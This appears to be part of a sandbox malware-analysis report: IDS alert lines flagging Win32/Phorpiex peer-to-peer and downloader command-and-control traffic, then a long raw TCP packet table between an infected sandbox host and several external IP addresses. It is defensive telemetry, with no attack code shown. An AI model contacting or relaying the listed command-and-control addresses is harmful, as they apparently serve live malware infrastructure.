2024-10-26T07:27:44.123347+0200	2044077	ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC	1	192.168.2.7	65303	90.156.162.79	40500	UDP
2024-10-26T07:27:47.532889+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49994	185.215.113.66	80	TCP
2024-10-26T07:27:47.532889+0200	2848295	ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3	1	192.168.2.7	49994	185.215.113.66	80	TCP
2024-10-26T07:27:49.142537+0200	2044077	ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC	1	192.168.2.7	65303	175.107.23.112	40500	UDP
2024-10-26T07:27:50.560256+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49996	185.215.113.66	80	TCP
2024-10-26T07:27:50.560256+0200	2848295	ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3	1	192.168.2.7	49996	185.215.113.66	80	TCP
2024-10-26T07:27:54.155419+0200	2044077	ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC	1	192.168.2.7	65303	185.71.152.222	40500	UDP
2024-10-26T07:27:56.986988+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49996	185.215.113.66	80	TCP
2024-10-26T07:27:56.986988+0200	2848295	ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3	1	192.168.2.7	49996	185.215.113.66	80	TCP
2024-10-26T07:27:59.047279+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49998	185.215.113.66	80	TCP
2024-10-26T07:27:59.047279+0200	2848295	ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3	1	192.168.2.7	49998	185.215.113.66	80	TCP
2024-10-26T07:28:04.201234+0200	2044077	ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC	1	192.168.2.7	65303	124.109.48.132	40500	UDP
2024-10-26T07:28:05.957338+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49998	185.215.113.66	80	TCP
2024-10-26T07:28:05.957338+0200	2848295	ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3	1	192.168.2.7	49998	185.215.113.66	80	TCP
2024-10-26T07:28:07.933526+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	50000	185.215.113.66	80	TCP
2024-10-26T07:28:07.933526+0200	2848295	ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3	1	192.168.2.7	50000	185.215.113.66	80	TCP
2024-10-26T07:28:09.215117+0200	2044077	ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC	1	192.168.2.7	65303	213.206.50.15	40500	UDP
2024-10-26T07:28:14.218368+0200	2044077	ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC	1	192.168.2.7	65303	109.165.55.243	40500	UDP
2024-10-26T07:28:16.804925+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	50002	91.202.233.141	80	TCP
2024-10-26T07:28:16.804925+0200	2848295	ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3	1	192.168.2.7	50002	91.202.233.141	80	TCP
2024-10-26T07:28:19.244467+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	50002	91.202.233.141	80	TCP
2024-10-26T07:28:19.244467+0200	2848295	ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3	1	192.168.2.7	50002	91.202.233.141	80	TCP
2024-10-26T07:28:19.256594+0200	2044077	ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC	1	192.168.2.7	65303	175.106.46.94	40500	UDP
2024-10-26T07:28:21.708824+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	50002	91.202.233.141	80	TCP
2024-10-26T07:28:21.708824+0200	2848295	ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3	1	192.168.2.7	50002	91.202.233.141	80	TCP
2024-10-26T07:28:24.042373+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	50002	91.202.233.141	80	TCP
2024-10-26T07:28:24.042373+0200	2848295	ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3	1	192.168.2.7	50002	91.202.233.141	80	TCP
2024-10-26T07:28:24.271475+0200	2044077	ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC	1	192.168.2.7	65303	195.190.112.66	40500	UDP
2024-10-26T07:28:26.416523+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	50002	91.202.233.141	80	TCP
2024-10-26T07:28:26.416523+0200	2848295	ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3	1	192.168.2.7	50002	91.202.233.141	80	TCP
2024-10-26T07:28:29.267068+0200	2044077	ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC	1	192.168.2.7	65303	87.237.236.86	40500	UDP
2024-10-26T07:28:30.988248+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	50005	185.215.113.66	80	TCP
2024-10-26T07:28:30.988248+0200	2848295	ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3	1	192.168.2.7	50005	185.215.113.66	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 26, 2024 07:26:26.020061016 CEST	49714	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:26.025465012 CEST	80	49714	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:26.025573969 CEST	49714	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:26.025755882 CEST	49714	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:26.031009912 CEST	80	49714	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:26.938110113 CEST	80	49714	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:26.938183069 CEST	80	49714	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:26.938190937 CEST	49714	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:26.938219070 CEST	80	49714	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:26.938234091 CEST	49714	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:26.938250065 CEST	80	49714	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:26.938266039 CEST	49714	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:26.938298941 CEST	80	49714	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:26.938328981 CEST	49714	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:26.938335896 CEST	49714	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:26.938343048 CEST	80	49714	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:26.938378096 CEST	80	49714	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:26.938389063 CEST	49714	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:26.938412905 CEST	80	49714	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:26.938421011 CEST	49714	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:26.938513994 CEST	80	49714	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:26.938522100 CEST	49714	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:26.938550949 CEST	80	49714	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:26.938553095 CEST	49714	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:26.938613892 CEST	49714	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:26.944076061 CEST	80	49714	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:26.944125891 CEST	49714	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:27.258315086 CEST	49714	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:29.167272091 CEST	49732	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:29.172818899 CEST	80	49732	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:29.172883987 CEST	49732	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:29.173016071 CEST	49732	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:29.178477049 CEST	80	49732	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:30.080782890 CEST	80	49732	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:30.080817938 CEST	80	49732	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:30.080832958 CEST	80	49732	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:30.080849886 CEST	80	49732	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:30.080868006 CEST	80	49732	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:30.080884933 CEST	80	49732	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:30.080926895 CEST	49732	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:30.080926895 CEST	49732	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:30.080944061 CEST	80	49732	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:30.080960035 CEST	80	49732	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:30.080974102 CEST	80	49732	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:30.080988884 CEST	49732	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:30.080990076 CEST	80	49732	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:30.081016064 CEST	49732	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:30.081039906 CEST	49732	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:30.086544991 CEST	80	49732	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:30.086600065 CEST	80	49732	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:30.086610079 CEST	49732	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:30.086639881 CEST	49732	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:30.086692095 CEST	80	49732	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:30.086731911 CEST	49732	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:30.242264032 CEST	80	49732	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:30.242305994 CEST	80	49732	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:30.242403030 CEST	80	49732	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:30.242418051 CEST	49732	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:30.242433071 CEST	80	49732	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:30.242443085 CEST	49732	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:30.242443085 CEST	49732	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:30.242496967 CEST	49732	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:30.242526054 CEST	80	49732	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:30.242669106 CEST	80	49732	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:30.242698908 CEST	49732	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:30.242706060 CEST	80	49732	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:30.242707968 CEST	49732	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:30.242741108 CEST	80	49732	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:30.242760897 CEST	49732	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:30.242784023 CEST	49732	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:30.243185043 CEST	80	49732	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:30.243235111 CEST	49732	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:30.243242979 CEST	80	49732	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:30.243278980 CEST	80	49732	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:30.243294001 CEST	49732	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:30.243331909 CEST	49732	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:30.243331909 CEST	80	49732	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:30.243369102 CEST	80	49732	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:30.243386030 CEST	49732	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:30.243417978 CEST	49732	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:30.244045973 CEST	80	49732	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:30.244097948 CEST	49732	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:30.244098902 CEST	80	49732	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:30.244144917 CEST	49732	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:30.244149923 CEST	80	49732	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:30.244184971 CEST	80	49732	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:30.244199991 CEST	49732	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:30.244220018 CEST	80	49732	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:30.244234085 CEST	49732	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:30.244266987 CEST	49732	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:30.244996071 CEST	80	49732	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:30.245029926 CEST	80	49732	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:30.245050907 CEST	49732	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:30.245069027 CEST	49732	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:30.245083094 CEST	80	49732	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:30.245116949 CEST	80	49732	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:30.245126963 CEST	49732	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:30.245158911 CEST	80	49732	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:30.245158911 CEST	49732	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:30.245203972 CEST	49732	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:30.248441935 CEST	80	49732	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:30.248480082 CEST	80	49732	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:30.248522997 CEST	49732	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:30.248522997 CEST	49732	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:30.403995037 CEST	80	49732	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:30.404012918 CEST	80	49732	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:30.404053926 CEST	49732	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:30.404081106 CEST	49732	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:30.404109001 CEST	80	49732	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:30.404124975 CEST	80	49732	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:30.404141903 CEST	80	49732	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:30.404149055 CEST	49732	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:30.404159069 CEST	49732	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:30.404182911 CEST	49732	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:30.404210091 CEST	80	49732	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:30.404226065 CEST	80	49732	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:30.404248953 CEST	49732	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:30.404257059 CEST	80	49732	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:30.404266119 CEST	49732	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:30.404273987 CEST	80	49732	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:30.404293060 CEST	80	49732	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:30.404308081 CEST	49732	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:30.404309034 CEST	80	49732	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:30.404326916 CEST	49732	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:30.404361010 CEST	49732	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:30.404891014 CEST	80	49732	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:30.404906988 CEST	80	49732	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:30.404922962 CEST	80	49732	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:30.404932022 CEST	49732	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:30.404937029 CEST	80	49732	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:30.404941082 CEST	49732	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:30.404959917 CEST	49732	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:30.404984951 CEST	49732	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:30.405061960 CEST	80	49732	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:30.405076981 CEST	80	49732	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:30.405092955 CEST	80	49732	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:30.405105114 CEST	49732	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:30.405117035 CEST	49732	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:30.405132055 CEST	49732	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:30.405141115 CEST	80	49732	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:30.405157089 CEST	80	49732	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:30.405179977 CEST	49732	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:30.405198097 CEST	49732	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:30.405493021 CEST	80	49732	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:30.405514956 CEST	80	49732	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:30.405531883 CEST	80	49732	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:30.405534983 CEST	49732	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:30.405553102 CEST	49732	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:30.405556917 CEST	80	49732	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:30.405572891 CEST	49732	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:30.405572891 CEST	80	49732	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:30.405590057 CEST	80	49732	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:30.405596018 CEST	49732	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:30.405606985 CEST	49732	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:30.405613899 CEST	80	49732	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:30.405626059 CEST	49732	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:30.405631065 CEST	80	49732	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:30.405647993 CEST	80	49732	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:30.405649900 CEST	49732	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:30.405659914 CEST	49732	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:30.405663967 CEST	80	49732	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:30.405685902 CEST	49732	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:30.405700922 CEST	49732	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:30.406311989 CEST	80	49732	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:30.406356096 CEST	80	49732	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:30.406357050 CEST	49732	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:30.406373978 CEST	80	49732	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:30.406398058 CEST	80	49732	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:30.406400919 CEST	49732	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:30.406414986 CEST	80	49732	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:30.406424046 CEST	49732	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:30.406431913 CEST	80	49732	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:30.406444073 CEST	49732	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:30.406459093 CEST	49732	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:30.406477928 CEST	49732	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:30.406485081 CEST	80	49732	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:30.406508923 CEST	80	49732	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:30.406523943 CEST	49732	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:30.406526089 CEST	80	49732	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:30.406539917 CEST	49732	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:30.406542063 CEST	80	49732	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:30.406563997 CEST	49732	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:30.406579971 CEST	49732	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:30.407166958 CEST	80	49732	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:30.407206059 CEST	49732	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:34.647906065 CEST	49732	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:34.653346062 CEST	80	49732	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:35.032983065 CEST	80	49732	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:35.033091068 CEST	49732	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:37.858195066 CEST	49732	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:40.762039900 CEST	49795	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:40.767409086 CEST	80	49795	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:40.769169092 CEST	49795	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:40.771573067 CEST	49795	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:40.776834965 CEST	80	49795	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:41.658898115 CEST	80	49795	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:41.658919096 CEST	80	49795	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:41.658979893 CEST	49795	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:41.658979893 CEST	49795	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:41.659034967 CEST	80	49795	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:41.659049034 CEST	80	49795	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:41.659071922 CEST	80	49795	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:41.659086943 CEST	80	49795	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:41.659101009 CEST	80	49795	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:41.659107924 CEST	49795	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:41.659107924 CEST	49795	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:41.659116983 CEST	80	49795	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:41.659130096 CEST	80	49795	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:41.659145117 CEST	80	49795	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:41.659182072 CEST	49795	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:41.659182072 CEST	49795	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:41.660269022 CEST	49795	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:41.660295963 CEST	49795	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:41.664514065 CEST	80	49795	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:41.664541006 CEST	80	49795	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:41.664570093 CEST	49795	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:41.664618015 CEST	49795	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:41.664760113 CEST	80	49795	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:41.664776087 CEST	80	49795	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:41.664792061 CEST	80	49795	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:41.664805889 CEST	49795	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:41.664927959 CEST	49795	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:41.664947987 CEST	49795	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:42.668836117 CEST	49810	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:42.674251080 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:42.674334049 CEST	49810	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:42.674529076 CEST	49810	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:42.679799080 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:43.624396086 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:43.624443054 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:43.624459982 CEST	49810	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:43.624474049 CEST	49810	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:43.624496937 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:43.624515057 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:43.624541044 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:43.624552011 CEST	49810	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:43.624552011 CEST	49810	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:43.624560118 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:43.624577045 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:43.624593019 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:43.624603033 CEST	49810	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:43.624603033 CEST	49810	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:43.624608994 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:43.624624014 CEST	49810	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:43.624627113 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:43.624634981 CEST	49810	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:43.624659061 CEST	49810	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:43.624702930 CEST	49810	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:43.630068064 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:43.630096912 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:43.630141973 CEST	49810	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:43.630165100 CEST	49810	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:43.630201101 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:43.630239964 CEST	49810	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:43.727273941 CEST	49816	40500	192.168.2.7	94.230.237.65
Oct 26, 2024 07:26:43.732836008 CEST	40500	49816	94.230.237.65	192.168.2.7
Oct 26, 2024 07:26:43.732897997 CEST	49816	40500	192.168.2.7	94.230.237.65
Oct 26, 2024 07:26:43.734334946 CEST	49816	40500	192.168.2.7	94.230.237.65
Oct 26, 2024 07:26:43.739703894 CEST	40500	49816	94.230.237.65	192.168.2.7
Oct 26, 2024 07:26:43.739756107 CEST	49816	40500	192.168.2.7	94.230.237.65
Oct 26, 2024 07:26:43.745134115 CEST	40500	49816	94.230.237.65	192.168.2.7
Oct 26, 2024 07:26:43.791670084 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:43.791685104 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:43.791748047 CEST	49810	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:43.791804075 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:43.791815996 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:43.791826963 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:43.791860104 CEST	49810	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:43.791872978 CEST	49810	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:43.792301893 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:43.792316914 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:43.792327881 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:43.792350054 CEST	49810	80	192.168.2.7	185.215.113.66
